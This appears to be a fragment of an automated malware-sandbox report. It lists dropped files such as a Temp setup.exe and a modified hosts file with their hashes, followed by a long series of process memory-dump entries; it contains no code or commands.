C:\Windows\Temp\setup.exeFilesize
7.3MB
MD5baeb20fb698c26b6f053215674129767
SHA15eb9614a66b13b71841c8fbe7e770b17ceb3c964
SHA25699e60e60a88630a8b730e0ca877bb62fde487d308729e627310a6168830d45e0
SHA512a25d0b578ae2c7095389e885434110116314ef4b20aed91df39de9167bc39775737be5fd73709c4f6f3c8f83800e109cf25389c4e2be37deb97f048de324965c
-
C:\Windows\Temp\setup.exeFilesize
7.3MB
MD5baeb20fb698c26b6f053215674129767
SHA15eb9614a66b13b71841c8fbe7e770b17ceb3c964
SHA25699e60e60a88630a8b730e0ca877bb62fde487d308729e627310a6168830d45e0
SHA512a25d0b578ae2c7095389e885434110116314ef4b20aed91df39de9167bc39775737be5fd73709c4f6f3c8f83800e109cf25389c4e2be37deb97f048de324965c
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
3KB
MD55d574dc518025fad52b7886c1bff0e13
SHA168217a5f9e9a64ca8fed9eefa4171786a8f9f8f7
SHA256755c4768f6e384030805284ab88689a325431667e9ab11d9aeaa55e9739742f2
SHA51221de152e07d269b265dae58d46e8c68a3268b2f78d771d4fc44377a14e0c6e73aadae923dcfd34ce2ef53c2eaa53d4df8f281d9b8a627edee213946c9ef37d13
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD5e2d46bffd1d9300639cac360fac02cb4
SHA1fd2b4813c8ab610294b6759192ca05bad5bb8958
SHA25694ffe575e92d3bab6173fd7eca207088c8b374de79d93dddf45101048c0bead3
SHA51254b1ea5f5bb1d8a402fbb5ab8f0d7bec9aa47cb48a4c411ee8032648a97efe466d9d8e7f87c5ac288e994eeb47e034eac94bb3631955f9ba2270d687e7620535
-
C:\Windows\system32\drivers\etc\hostsFilesize
2KB
MD5c5227366b7a688ff23b01788718251aa
SHA19795262e79c832ba49c744fcd1b1794c0ffb5c6a
SHA256789abfd744b03d07fac02be7177c535989ea9e92b9db32fb1360cdfd083a1f48
SHA5128b9560fa2265f74aec7bb7b96e5a7dba789edc4166e58af9994a1ee95fa42b22a7539be804f4fcf3d5a9e657be020087a343b030fee6aaddbb67b1134810cfbe
-
memory/8-327-0x0000000000000000-mapping.dmp
-
memory/68-194-0x00007FFF0F6E0000-0x00007FFF0F8BB000-memory.dmpFilesize
1.9MB
-
memory/68-204-0x0000000000400000-0x00000000010BF000-memory.dmpFilesize
12.7MB
-
memory/68-209-0x00007FFF0F6E0000-0x00007FFF0F8BB000-memory.dmpFilesize
1.9MB
-
memory/68-178-0x0000000000000000-mapping.dmp
-
memory/68-191-0x0000000000400000-0x00000000010BF000-memory.dmpFilesize
12.7MB
-
memory/164-658-0x0000019E75990000-0x0000019E759A2000-memory.dmpFilesize
72KB
-
memory/164-655-0x0000019E74C80000-0x0000019E74C86000-memory.dmpFilesize
24KB
-
memory/388-396-0x0000000000000000-mapping.dmp
-
memory/508-686-0x0000000000000000-mapping.dmp
-
memory/588-320-0x0000000000000000-mapping.dmp
-
memory/652-389-0x0000000000000000-mapping.dmp
-
memory/744-689-0x0000000000000000-mapping.dmp
-
memory/916-687-0x0000000000000000-mapping.dmp
-
memory/1020-654-0x0000000000000000-mapping.dmp
-
memory/1200-512-0x000001792AA20000-0x000001792AA3C000-memory.dmpFilesize
112KB
-
memory/1200-551-0x000001792AA40000-0x000001792AA4A000-memory.dmpFilesize
40KB
-
memory/1200-518-0x000001792AD80000-0x000001792AE39000-memory.dmpFilesize
740KB
-
memory/1200-479-0x0000000000000000-mapping.dmp
-
memory/1304-650-0x0000000000000000-mapping.dmp
-
memory/1308-335-0x0000000000000000-mapping.dmp
-
memory/1460-334-0x0000000000000000-mapping.dmp
-
memory/1564-379-0x0000000000000000-mapping.dmp
-
memory/1832-652-0x0000000000000000-mapping.dmp
-
memory/2036-356-0x0000000000000000-mapping.dmp
-
memory/2364-321-0x0000000000000000-mapping.dmp
-
memory/2368-388-0x0000000000000000-mapping.dmp
-
memory/2544-667-0x0000000000000000-mapping.dmp
-
memory/2572-325-0x0000000000000000-mapping.dmp
-
memory/2576-390-0x0000000000000000-mapping.dmp
-
memory/2612-665-0x0000000000000000-mapping.dmp
-
memory/2644-324-0x0000000000000000-mapping.dmp
-
memory/2660-393-0x0000000000000000-mapping.dmp
-
memory/2848-673-0x0000000000000000-mapping.dmp
-
memory/2880-668-0x0000000000000000-mapping.dmp
-
memory/3092-671-0x0000000000000000-mapping.dmp
-
memory/3096-154-0x0000000076F70000-0x00000000770FE000-memory.dmpFilesize
1.6MB
-
memory/3096-121-0x0000000076F70000-0x00000000770FE000-memory.dmpFilesize
1.6MB
-
memory/3096-164-0x0000000076F70000-0x00000000770FE000-memory.dmpFilesize
1.6MB
-
memory/3096-161-0x0000000076F70000-0x00000000770FE000-memory.dmpFilesize
1.6MB
-
memory/3096-160-0x0000000076F70000-0x00000000770FE000-memory.dmpFilesize
1.6MB
-
memory/3096-166-0x0000000076F70000-0x00000000770FE000-memory.dmpFilesize
1.6MB
-
memory/3096-168-0x0000000076F70000-0x00000000770FE000-memory.dmpFilesize
1.6MB
-
memory/3096-169-0x0000000076F70000-0x00000000770FE000-memory.dmpFilesize
1.6MB
-
memory/3096-167-0x0000000076F70000-0x00000000770FE000-memory.dmpFilesize
1.6MB
-
memory/3096-170-0x0000000076F70000-0x00000000770FE000-memory.dmpFilesize
1.6MB
-
memory/3096-171-0x0000000076F70000-0x00000000770FE000-memory.dmpFilesize
1.6MB
-
memory/3096-172-0x0000000076F70000-0x00000000770FE000-memory.dmpFilesize
1.6MB
-
memory/3096-173-0x0000000076F70000-0x00000000770FE000-memory.dmpFilesize
1.6MB
-
memory/3096-175-0x0000000076F70000-0x00000000770FE000-memory.dmpFilesize
1.6MB
-
memory/3096-176-0x0000000076F70000-0x00000000770FE000-memory.dmpFilesize
1.6MB
-
memory/3096-174-0x0000000076F70000-0x00000000770FE000-memory.dmpFilesize
1.6MB
-
memory/3096-177-0x0000000076F70000-0x00000000770FE000-memory.dmpFilesize
1.6MB
-
memory/3096-163-0x0000000076F70000-0x00000000770FE000-memory.dmpFilesize
1.6MB
-
memory/3096-135-0x0000000076F70000-0x00000000770FE000-memory.dmpFilesize
1.6MB
-
memory/3096-115-0x0000000076F70000-0x00000000770FE000-memory.dmpFilesize
1.6MB
-
memory/3096-162-0x0000000076F70000-0x00000000770FE000-memory.dmpFilesize
1.6MB
-
memory/3096-159-0x0000000076F70000-0x00000000770FE000-memory.dmpFilesize
1.6MB
-
memory/3096-158-0x0000000076F70000-0x00000000770FE000-memory.dmpFilesize
1.6MB
-
memory/3096-157-0x0000000076F70000-0x00000000770FE000-memory.dmpFilesize
1.6MB
-
memory/3096-156-0x0000000076F70000-0x00000000770FE000-memory.dmpFilesize
1.6MB
-
memory/3096-116-0x0000000076F70000-0x00000000770FE000-memory.dmpFilesize
1.6MB
-
memory/3096-155-0x0000000076F70000-0x00000000770FE000-memory.dmpFilesize
1.6MB
-
memory/3096-114-0x0000000076F70000-0x00000000770FE000-memory.dmpFilesize
1.6MB
-
memory/3096-117-0x0000000076F70000-0x00000000770FE000-memory.dmpFilesize
1.6MB
-
memory/3096-153-0x0000000076F70000-0x00000000770FE000-memory.dmpFilesize
1.6MB
-
memory/3096-165-0x0000000076F70000-0x00000000770FE000-memory.dmpFilesize
1.6MB
-
memory/3096-118-0x0000000076F70000-0x00000000770FE000-memory.dmpFilesize
1.6MB
-
memory/3096-119-0x0000000076F70000-0x00000000770FE000-memory.dmpFilesize
1.6MB
-
memory/3096-134-0x0000000076F70000-0x00000000770FE000-memory.dmpFilesize
1.6MB
-
memory/3096-152-0x0000000076F70000-0x00000000770FE000-memory.dmpFilesize
1.6MB
-
memory/3096-151-0x0000000076F70000-0x00000000770FE000-memory.dmpFilesize
1.6MB
-
memory/3096-148-0x0000000076F70000-0x00000000770FE000-memory.dmpFilesize
1.6MB
-
memory/3096-150-0x0000000076F70000-0x00000000770FE000-memory.dmpFilesize
1.6MB
-
memory/3096-149-0x0000000076F70000-0x00000000770FE000-memory.dmpFilesize
1.6MB
-
memory/3096-120-0x0000000076F70000-0x00000000770FE000-memory.dmpFilesize
1.6MB
-
memory/3096-122-0x0000000076F70000-0x00000000770FE000-memory.dmpFilesize
1.6MB
-
memory/3096-136-0x0000000076F70000-0x00000000770FE000-memory.dmpFilesize
1.6MB
-
memory/3096-123-0x0000000076F70000-0x00000000770FE000-memory.dmpFilesize
1.6MB
-
memory/3096-124-0x0000000076F70000-0x00000000770FE000-memory.dmpFilesize
1.6MB
-
memory/3096-125-0x0000000076F70000-0x00000000770FE000-memory.dmpFilesize
1.6MB
-
memory/3096-146-0x0000000076F70000-0x00000000770FE000-memory.dmpFilesize
1.6MB
-
memory/3096-147-0x0000000076F70000-0x00000000770FE000-memory.dmpFilesize
1.6MB
-
memory/3096-145-0x0000000076F70000-0x00000000770FE000-memory.dmpFilesize
1.6MB
-
memory/3096-126-0x0000000076F70000-0x00000000770FE000-memory.dmpFilesize
1.6MB
-
memory/3096-128-0x0000000076F70000-0x00000000770FE000-memory.dmpFilesize
1.6MB
-
memory/3096-143-0x0000000076F70000-0x00000000770FE000-memory.dmpFilesize
1.6MB
-
memory/3096-144-0x0000000076F70000-0x00000000770FE000-memory.dmpFilesize
1.6MB
-
memory/3096-129-0x0000000076F70000-0x00000000770FE000-memory.dmpFilesize
1.6MB
-
memory/3096-127-0x0000000076F70000-0x00000000770FE000-memory.dmpFilesize
1.6MB
-
memory/3096-142-0x0000000076F70000-0x00000000770FE000-memory.dmpFilesize
1.6MB
-
memory/3096-130-0x0000000076F70000-0x00000000770FE000-memory.dmpFilesize
1.6MB
-
memory/3096-131-0x0000000076F70000-0x00000000770FE000-memory.dmpFilesize
1.6MB
-
memory/3096-133-0x0000000076F70000-0x00000000770FE000-memory.dmpFilesize
1.6MB
-
memory/3096-132-0x0000000076F70000-0x00000000770FE000-memory.dmpFilesize
1.6MB
-
memory/3096-141-0x0000000076F70000-0x00000000770FE000-memory.dmpFilesize
1.6MB
-
memory/3096-140-0x0000000076F70000-0x00000000770FE000-memory.dmpFilesize
1.6MB
-
memory/3096-139-0x0000000076F70000-0x00000000770FE000-memory.dmpFilesize
1.6MB
-
memory/3096-138-0x0000000076F70000-0x00000000770FE000-memory.dmpFilesize
1.6MB
-
memory/3096-137-0x0000000076F70000-0x00000000770FE000-memory.dmpFilesize
1.6MB
-
memory/3120-690-0x0000000000000000-mapping.dmp
-
memory/3208-386-0x0000000000000000-mapping.dmp
-
memory/3208-663-0x0000000000000000-mapping.dmp
-
memory/3216-240-0x0000000000000000-mapping.dmp
-
memory/3216-257-0x000001B16DCB0000-0x000001B16DCD2000-memory.dmpFilesize
136KB
-
memory/3216-266-0x000001B16FFA0000-0x000001B170016000-memory.dmpFilesize
472KB
-
memory/3552-471-0x00007FFF0F6E0000-0x00007FFF0F8BB000-memory.dmpFilesize
1.9MB
-
memory/3552-433-0x0000000000000000-mapping.dmp
-
memory/3552-470-0x0000000000400000-0x00000000010BF000-memory.dmpFilesize
12.7MB
-
memory/3552-462-0x00007FFF0F6E0000-0x00007FFF0F8BB000-memory.dmpFilesize
1.9MB
-
memory/3552-461-0x0000000000400000-0x00000000010BF000-memory.dmpFilesize
12.7MB
-
memory/3588-684-0x0000000000000000-mapping.dmp
-
memory/3604-341-0x0000000000000000-mapping.dmp
-
memory/3628-653-0x0000000000000000-mapping.dmp
-
memory/3640-353-0x0000000000000000-mapping.dmp
-
memory/3640-646-0x0000000000000000-mapping.dmp
-
memory/3764-647-0x0000000000000000-mapping.dmp
-
memory/3772-358-0x0000000000000000-mapping.dmp
-
memory/3952-670-0x0000000000000000-mapping.dmp
-
memory/3972-669-0x0000000000000000-mapping.dmp
-
memory/4008-326-0x0000000000000000-mapping.dmp
-
memory/4020-329-0x0000000000000000-mapping.dmp
-
memory/4136-651-0x0000000000000000-mapping.dmp
-
memory/4280-181-0x0000000000000000-mapping.dmp
-
memory/4292-182-0x0000000000000000-mapping.dmp
-
memory/4324-675-0x000000014036EAC4-mapping.dmp
-
memory/4324-693-0x0000000140000000-0x0000000140809000-memory.dmpFilesize
8.0MB
-
memory/4324-691-0x0000000140000000-0x0000000140809000-memory.dmpFilesize
8.0MB
-
memory/4436-648-0x0000000000000000-mapping.dmp
-
memory/4448-682-0x0000000000000000-mapping.dmp
-
memory/4460-382-0x0000000000000000-mapping.dmp
-
memory/4468-681-0x0000000000000000-mapping.dmp
-
memory/4484-688-0x0000000000000000-mapping.dmp
-
memory/4508-683-0x0000000000000000-mapping.dmp
-
memory/4528-362-0x0000000000000000-mapping.dmp
-
memory/4536-387-0x0000000000000000-mapping.dmp
-
memory/4612-385-0x0000000000000000-mapping.dmp
-
memory/4664-328-0x0000000000000000-mapping.dmp
-
memory/4692-672-0x0000000000000000-mapping.dmp
-
memory/4748-220-0x0000024AB4580000-0x0000024AB499E000-memory.dmpFilesize
4.1MB
-
memory/4748-206-0x0000024A99510000-0x0000024A9992E000-memory.dmpFilesize
4.1MB
-
memory/4756-330-0x0000000000000000-mapping.dmp
-
memory/4796-331-0x0000000000000000-mapping.dmp
-
memory/4800-399-0x0000000000000000-mapping.dmp
-
memory/4924-685-0x0000000000000000-mapping.dmp
-
memory/4928-319-0x0000000000000000-mapping.dmp
-
memory/5072-678-0x0000023D306A0000-0x0000023D306A7000-memory.dmpFilesize
28KB
-
memory/5072-661-0x0000023D30DC0000-0x0000023D30DC6000-memory.dmpFilesize
24KB
-
memory/5092-332-0x0000000000000000-mapping.dmp